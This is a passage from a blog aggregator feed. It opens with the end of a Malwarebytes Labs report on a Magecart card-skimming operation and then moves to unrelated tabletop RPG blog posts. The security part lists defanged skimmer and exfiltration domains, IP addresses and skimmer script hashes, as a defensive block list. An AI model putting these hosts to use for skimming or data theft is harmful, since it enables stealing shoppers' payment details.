Due to the very nature of such hosts, takedown operations are difficult. It’s not simply a case of a provider turning a blind eye on shady operations, but rather it is the core of their business model.

To protect our users against these threats, we are blocking all the domains and IP addresses we can find associated with skimmers and malware in general. We are also reporting the compromised Magento stores to their respective registrars/hosts.

Indicators of Compromise

Skimmers (hosts)
google-anaiytic[.]com (176.119.1[.]72)
xn--google-analytcs-xpb[.]com (176.119.1[.]70)

Skimmers (exfiltration gate/panel)
google.ssl.lnfo[.]cc (176.119.1[.]92)

Skimmers (JavaScript)
2cf2d3608a3e5dc2e0629bc80b5c3f11007608a1e6a3159931bb403f2a2ae09b
687a0deb72c250a24245e68101f2bd1acc377fc90ac22140f5cca9f515fc3914
7a20d0a5d8397624623e0a27d93c8741c187249d78e8f6d9dcad45010293d300
d5cbb9011352525a607c430c338a68a0a39d172940f03bb81b3bdaba91cb0e66
757df530dffe4b303399421ea0c53eb1723ba413585ef4ede804aaffed5cc3c1
f4fad9c9018befdaa455b6c248dd7fc017ed32f69123b6a1d04b4a2e44d69b25
37aac00b65d009fb8899f129a82ee3480640f50253ee0ff934ad25b9089254f2
c399a312c842494f81438d4510f8a7e6721912eb319a57e3d1ab34937f9dc29f
209bc0b8274cac2ed00c1fab4546cb6ab11f118497c71698b0317dc12ac68afa
12ac099a2169734b395a2519bcb783696ec46c10a6cde0ee1ad3262876336cf6
aa64fa4ba75c8c30b7eb57a24cbdf5b1dbb08d728717c89018305294237ac717
6366167f3d6bec7cddce5a52a94441c1a4097e4c7ab4e7c9e5718c87660dc5e8
4e14ffc2ec79cb256605f7c2682d56fceec9638cd3545175088ad15977403dcc
ac5b6f62a62f4453c4b5c577b321fdca73d0e651c209aeb5b88a0c4a7f10b139
c139e980d2f5f21020b85db716c8a0d363ae3c30f54a7d5c290b320309283b59
27ab9adb71d7b49f8dcc1e2c168af06e4f71e4c43e7245663fcee191a70f7a7e
eb3adb1e1ae14300110439e490a39ed54ca51ba820944bd27f481b57eb0ab1aa
684fe4d87aa412c46b96dfa2c650bda2a0e9ef07bcaf294683387661107a5c72
6366167f3d6bec7cddce5a52a94441c1a4097e4c7ab4e7c9e5718c87660dc5e8
2c00997d6b0e9ae06d9ed2fcae6effe9348dc660b3fea1a4e5c011f1eb2b9ace
66312a50ce08e29c01e9dfeae631f839c95f2c04d8f206e12c04abdd0a5df645
af02b45c1d1198271da309b5eedde13c4e8a24934407f7a49f10707dfdd796b7
74ac75cd8f1e35da0d047ed6dd995262563b614b8dfcdfa44f689ca920b51a63
aa7372fbe02932d1182572e7cc6ba69243be3222eb212418d0b6ea638dea5fbc
341e88b473dae607b698737b6032c5a0ba3ed1a0ba08bba15757c68126a00e29
645032eaa3dd159ef027b916950c3e1ab475bedcaaac0f9c61b594d74d6833be
d74f5d6f91fbc37583e69cbc919fbe41caa84bc77713dc644bcda5b5b8581553
d8ed7abe7bdb821b93ce24e5ee0e5b867370b3fd6fc5c92f1f2d7d34fa040260

The post No man’s land: How a Magecart group is running a web skimming operation from a war zone appeared first on Malwarebytes Labs.

Categories: Techie Feeds

'Mi Go & Mythologies' More Old School & OSR Campaign Workshop

Swords & Stitchery - Thu, 07/18/2019 - 14:52
We've had some pop up thunderstorms & 'what not' weather here so I've been down under the weather today. But my mind's been churning over & over about this Godbound rpg  campaign. I've been writing in the back of my mind between work jobs. One of the primary foes that I had for my early games were the Mi Go. Specifically, the Mi Go of the early original  Dragon Magazine #12 (Feb 1978) which Needleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0
Categories: Tabletop Gaming Blogs

Spelljammer: Dead Stars & Outer Monstrosites

Sorcerer's Skull - Thu, 07/18/2019 - 11:00
Art from the Oldstyle Tales Press editionAs we understand the word," said the old Doctor. "Though, mind you, there may be a third factor. But, in my heart, I believe that it is a matter of chemistry; Conditions and a suitable medium; but given the Conditions, the Brute is so almighty that it will seize upon anything through which to manifest itself. It is a Force generated by Conditions; but nevertheless this does not bring us one iota nearer to its explanation, any more than to the explanation of Electricity or Fire. They are, all three, of the Outer Forces—Monsters of the Void.... - William Hope Hodgson, "The Derelict"
I've been thinking about a Spelljammer recently that keeps the basic concept but utterly jettisons the feel or flavor. Spelljammer has never felt me to be about exploration, rather the vessels flying through spaces seem a means to an end. There's nothing wrong with that, but plenty of science fiction literature paints space as a place for confronting the unknown. This is really a perfect fit for Spelljammer where its pre-modern, "magical" spacecraft put the stars within reach but not the science to understand any of it. Not that there is necessarily science as we know it to understand, in any case.
I think I would look to the horror/adventure stories of William Hope Hodgson, specifically his nautical yarns like The Boats of the Glen Carrig, "The Voice in the Night," "A Tropical Horror," and "Demons of the Sea." A little pseudo-science borrowed from his Carnacki stories could only help.
The characters are competent space-hands, perhaps mildly colorful rogues like Howard's Wild Bill Clanton or just working stiffs like the crew of the Nostromo in Alien, not bold explorers or science fantasy swashbucklers. Their jobs involving them going through places that are not (usually) inhabited by hostile species of space orcs or the like, but are instead fundamentally almost wild, always strange. Weird danger can rear it's head at any time, and your vessel is just another ship that disappeared in the Void.
Weird phenomena should be encountered as frequently as monsters, I think. Monsters, when they do show up should be unfamilar, and probably not seen enough to become mundane.
Beyond the stories of Hodgson and Alien, other potential sources of inspiration could be the comic series Outer Darkness, the science fiction stories of Clark Ashton Smith, Poe's Narrative of Arthur Gordon Pym, and of course, Moby Dick

1314

Looking For Group - Thu, 07/18/2019 - 04:00

The post 1314 appeared first on Looking For Group.

Categories: Web Comics

Juggers coming! Juggers coming!

Two Hour Wargames - Wed, 07/17/2019 - 22:51
Just got Qwik back from the editor. Look for some final Bat Reps and the game to be released sometime next week. And then there's After the Horsemen End Times, but that's another story.  
Categories: Tabletop Gaming Blogs

Don't Even Fix A Price - Astonishing Swordsmen & Sorcerers of Hyperborea Actual Play Session Report II

Swords & Stitchery - Wed, 07/17/2019 - 15:33
Further bits from last night's Astonishing Swordsmen & Sorcerers of Hyperborea game with DM Steve.We began the exploration of the inner workings of the sink hole with our two thieves repelling into the void with a pair of expensive silk & spiderweb ropes we had picked up back in the capital. They had short swords & mini wrist cross bows in the ready. We didn't have long to wait till we heard Needleshttp://www.blogger.com/profile/11243274667834930867noreply@blogger.com0
Categories: Tabletop Gaming Blogs

On the Spreading Word

Hack & Slash - Wed, 07/17/2019 - 14:39
Megadungeon #4 is coming, in about a week.

But there's something that needs to be done first.

The exciting part is discovering new worlds and spaces. How do I do that? Well, last time I sold some advertisements for things. And that was nice, and it got the word out about some great things to people who might not have ever considered them before.

But what I really want is the interesting feeling of looking through the ads in the back of old Dragon magazines.The pages with all the weird cool stuff.

So, look. I'm "Selling" advertising space. It's 20$ for a half page, 40$ for a full A5 page.
Except, if you don't have the money, and you have a project, you should go ahead and send me an ad.

It's more important to get the word out about a cool thing then it is to restrict access to letting people know about cool stuff.

It doesn't even have to be visual—if you have a small blurb about a product or your company, one that hundreds of buyers who are getting a 5e/basic megadungeon would be interested in do not let this opportunity go away.

Advertisements, questions and comments as well as advertisement payments (on paypal) can be sent to campbell at oook dot cz. The "deadline" for getting me your stuff or reserving a slot is Friday—let me know by then. But you'll actually have a bit longer to get it together.

Hack & Slash FollowGoogle +NewsletterSupportDonate to end Cancer (5 Star Rating)
Categories: Tabletop Gaming Blogs

Pages

Subscribe to Furiously Eclectic People aggregator